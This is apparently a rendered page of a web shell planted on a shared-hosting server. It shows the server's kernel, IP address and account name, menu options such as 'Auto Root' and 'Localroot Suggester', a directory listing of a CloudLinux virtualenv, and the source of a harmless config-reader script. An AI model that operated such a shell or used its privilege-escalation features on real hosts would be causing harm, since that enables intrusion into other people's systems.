Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cloudlinux /
venv /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
Activate.ps1
8.82
KB
-rw-r--r--
2025-04-17 13:12
activate
1.65
KB
-rw-r--r--
2025-04-17 13:12
activate.csh
915
B
-rw-r--r--
2025-04-17 13:12
activate.fish
2.14
KB
-rw-r--r--
2025-04-17 13:12
alembic
229
B
-rwxr-xr-x
2025-04-17 13:12
chardetect
237
B
-rwxr-xr-x
2025-04-17 13:12
cl_sysctl
4.51
KB
-rwxr-xr-x
2025-06-23 12:53
clcpapi
3.64
KB
-rwxr-xr-x
2025-06-23 12:53
coverage
231
B
-rwxr-xr-x
2025-04-17 13:12
coverage-3.11
231
B
-rwxr-xr-x
2025-04-17 13:12
coverage3
231
B
-rwxr-xr-x
2025-04-17 13:12
cpanel-dbmapping
3.84
KB
-rwxr-xr-x
2025-06-23 12:53
da_suid_caller.py
686
B
-rw-r--r--
2025-06-23 12:53
detect-requirements
238
B
-rwxr-xr-x
2025-04-17 13:12
dodgy
224
B
-rwxr-xr-x
2025-04-17 13:12
epylint
235
B
-rwxr-xr-x
2025-04-17 13:12
f2py
232
B
-rwxr-xr-x
2025-04-17 13:12
f2py3
232
B
-rwxr-xr-x
2025-04-17 13:12
f2py3.11
232
B
-rwxr-xr-x
2025-04-17 13:12
flake8
230
B
-rwxr-xr-x
2025-04-17 13:12
futurize
231
B
-rwxr-xr-x
2025-04-17 13:12
get_gprof
1.84
KB
-rwxr-xr-x
2025-04-17 13:12
get_objgraph
1.63
KB
-rwxr-xr-x
2025-04-17 13:12
isort
225
B
-rwxr-xr-x
2025-04-17 13:12
isort-identify-imports
259
B
-rwxr-xr-x
2025-04-17 13:12
jsonschema
229
B
-rwxr-xr-x
2025-04-17 13:12
lvestats_config_reader.py
1.12
KB
-rw-r--r--
2025-05-30 10:30
mako-render
229
B
-rwxr-xr-x
2025-04-17 13:12
normalizer
260
B
-rwxr-xr-x
2025-04-17 13:12
pasteurize
233
B
-rwxr-xr-x
2025-04-17 13:12
pip
237
B
-rwxr-xr-x
2025-04-17 13:12
pip3
237
B
-rwxr-xr-x
2025-04-17 13:12
pip3.11
237
B
-rwxr-xr-x
2025-04-17 13:12
plesk_suid_caller.py
905
B
-rw-r--r--
2025-06-23 12:53
prospector
229
B
-rwxr-xr-x
2025-04-17 13:12
py.test
237
B
-rwxr-xr-x
2025-04-17 13:12
pycodestyle
228
B
-rwxr-xr-x
2025-04-17 13:12
pydocstyle
229
B
-rwxr-xr-x
2025-04-17 13:12
pyflakes
227
B
-rwxr-xr-x
2025-04-17 13:12
pylint
233
B
-rwxr-xr-x
2025-04-17 13:12
pylint-config
249
B
-rwxr-xr-x
2025-04-17 13:12
pyreverse
239
B
-rwxr-xr-x
2025-04-17 13:12
pysemver
225
B
-rwxr-xr-x
2025-04-17 13:12
pytest
237
B
-rwxr-xr-x
2025-04-17 13:12
python
15.01
KB
-rwxr-xr-x
2025-06-23 16:51
python3
15.01
KB
-rwxr-xr-x
2025-06-23 16:51
python3.11
15.01
KB
-rwxr-xr-x
2025-06-23 16:51
raven
235
B
-rwxr-xr-x
2025-04-17 13:12
symilar
235
B
-rwxr-xr-x
2025-04-17 13:12
tap
223
B
-rwxr-xr-x
2025-04-17 13:12
tappy
223
B
-rwxr-xr-x
2025-04-17 13:12
undill
603
B
-rwxr-xr-x
2025-04-17 13:12
virtualenv
254
B
-rwxr-xr-x
2025-04-17 13:12
Save
Rename
# coding: utf-8 # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2021 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENSE.TXT import argparse import sys import json from lvestats.plugins.generic.statsnotifier import get_stats_notifier_parameters from clcommon.utils import is_user_present SUPPORTED_PARAMS = ['notification_allowed'] if __name__ == '__main__': parser = argparse.ArgumentParser(description='Tool for getting parameters from config') parser.add_argument('-u', '--user', required=True, help='Specify username') parser.add_argument('parameter', help='Parameter to read', choices=SUPPORTED_PARAMS) args = parser.parse_args() target_user = args.user if not is_user_present(target_user): print(json.dumps({'error': f'No such user {target_user}'})) sys.exit(-1) try: result = get_stats_notifier_parameters(target_user) print(json.dumps({args.parameter: result})) sys.exit(0) except Exception as e: print(json.dumps({'error': str(e)})) sys.exit(-1)